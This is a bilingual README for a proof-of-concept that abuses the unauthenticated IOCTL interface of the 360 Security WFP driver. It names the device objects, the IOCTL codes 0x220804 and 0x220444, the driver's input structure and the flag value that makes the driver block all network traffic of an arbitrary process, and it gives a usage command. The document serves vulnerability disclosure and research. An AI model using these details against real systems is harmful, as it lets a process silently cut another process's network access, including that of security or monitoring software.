A proof-of-concept (PoC) demonstrating potential abuse of the 360 Security WFP driver (360netmon_x64_wfp.sys) interface, aimed at verifying the risk that IOCTL interfaces without caller authentication may be misused by third-party programs.

This project is intended for security research and vulnerability analysis only. It must not be used for any illegal purposes.

During reverse engineering of the 360 Security network monitoring driver 360netmon_x64_wfp.sys, the following behaviors were discovered:

• The driver exposes two device objects to user mode:

  • \\.\360TdiFilter
  • \\.\360TdiSpeed

• These device objects can be accessed by any administrator-level process via DeviceIoControl

• The IrpMjDeviceControl handler performs no caller identity or signature verification

• Certain IOCTL functions can be directly used to:

  • Dynamically add WFP filters
  • Configure process network throttling
  • Completely block network access for arbitrary processes

This repository provides a minimal PoC to demonstrate:

How a process running on a system with 360 Security installed can block network access of any specified process using legitimate driver interfaces.

At the entry point of the driver’s IrpMjDeviceControl routine, only the device object is validated:

cmp rdi, g_pDeviceObject_TdiFilter
jz  ...

No caller privilege validation or source authentication is performed at all.

As a result, any administrator-privileged process can:

• Call IOCTL 0x220804 to configure process network throttling or blocking
• Call IOCTL 0x220444 to dynamically modify WFP filtering rules

This PoC implements the following operations:

• Open the device object \\.\360TdiFilter
• Construct the input data structure expected by the driver
• Use IOCTL 0x220804 to set a target process into “fully block network” mode

Result:

• All TCP/UDP connections of the specified process are dropped at the WFP layer
• No code injection or hooking is required
• The operation is performed entirely through legitimate driver interfaces

Open the project in Visual Studio and build:

x64 Release

360WFP_Exploit.exe "C:\Windows\System32\notepad.exe"

After execution, the target process will immediately lose all network connectivity.

.
├── src/
│   ├── main.c          // PoC main logic
│   ├── driver_io.c     // IOCTL invocation wrapper
│   └── utils.c         // helper functions (e.g., path conversion)
├── README.md
└── LICENSE

Core data structure expected by the driver:

typedef struct _PACK {
    WCHAR szNtPath[MAX_PATH + 40];
    WCHAR szPath[MAX_PATH];
    BOOL bCancelFlag;
    LONGLONG qwBlockCnnt;
    LONGLONG nLimitSend;
    LONGLONG nLimitRecv;
    DWORD dwZeroCheck;
} PACK, *PPACK;

When:

qwBlockCnnt = LLONG_MAX

the driver returns in the WFP Callout:

FWP_ACTION_BLOCK

which results in complete network blocking for the target process.

• This project is provided for security research and technical learning purposes only
• Do not use it for any illegal or unauthorized activities
• The author bears no responsibility for any consequences resulting from misuse of this tool

一个针对 360 安全卫士 WFP 驱动（360netmon_x64_wfp.sys）的接口滥用演示 PoC，用于验证驱动 IOCTL 接口在未进行调用者身份校验情况下，可能被第三方程序滥用的问题。

本项目仅用于安全研究与漏洞分析演示，不用于任何非法用途。

在对 360 安全卫士网络监控驱动 360netmon_x64_wfp.sys 的逆向分析过程中发现：

• 驱动向用户态暴露了两个设备对象：

  • \\.\360TdiFilter
  • \\.\360TdiSpeed

• 这些设备对象允许普通管理员进程通过 DeviceIoControl 发送 IOCTL 请求

• IrpMjDeviceControl 中没有对调用者进行任何身份或签名验证

• 部分 IOCTL 功能可以被直接用于：

  • 动态添加 WFP Filter
  • 设置进程网络限速
  • 直接阻断任意进程的网络连接

本仓库提供了一个最小化 PoC，用于演示：

在已安装 360 安全卫士的系统上，如何通过合法接口阻断任意指定进程的网络访问。

驱动的 IrpMjDeviceControl 入口处仅验证设备对象是否匹配：

cmp rdi, g_pDeviceObject_TdiFilter
jz  ...

完全没有进行调用者权限校验或来源验证。

因此，任何具有管理员权限的进程，都可以：

• 调用 IOCTL 0x220804 设置进程网络限速/阻断
• 调用 IOCTL 0x220444 动态修改 WFP 过滤规则

本 PoC 实现了：

• 打开 \\.\360TdiFilter 设备
• 构造驱动期望的数据结构
• 通过 IOCTL 0x220804 将目标进程设置为“完全阻断网络”模式

效果：

• 指定进程所有 TCP/UDP 连接被 WFP 层直接丢弃
• 无需注入、无需 HOOK、完全通过驱动合法接口实现

使用 Visual Studio 打开项目并编译：

x64 Release

360WFP_Exploit.exe "C:\Windows\System32\notepad.exe"

执行后，目标进程将被立即阻断网络访问。

.
├── src/
│   ├── main.c          // PoC 主逻辑
│   ├── driver_io.c     // IOCTL 调用封装
│   └── utils.c         // 路径转换等辅助函数
├── README.md
└── LICENSE

驱动期望的核心数据结构：

typedef struct _PACK {
    WCHAR szNtPath[MAX_PATH + 40];
    WCHAR szPath[MAX_PATH];
    BOOL bCancelFlag;
    LONGLONG qwBlockCnnt;
    LONGLONG nLimitSend;
    LONGLONG nLimitRecv;
    DWORD dwZeroCheck;
} PACK, *PPACK;

当：

qwBlockCnnt = LLONG_MAX

时，驱动会在 WFP Callout 中直接返回：

FWP_ACTION_BLOCK

从而彻底阻断目标进程的网络通信。

• 本项目仅用于安全研究与技术交流
• 请勿用于任何非法用途
• 因滥用本工具造成的任何后果与作者无关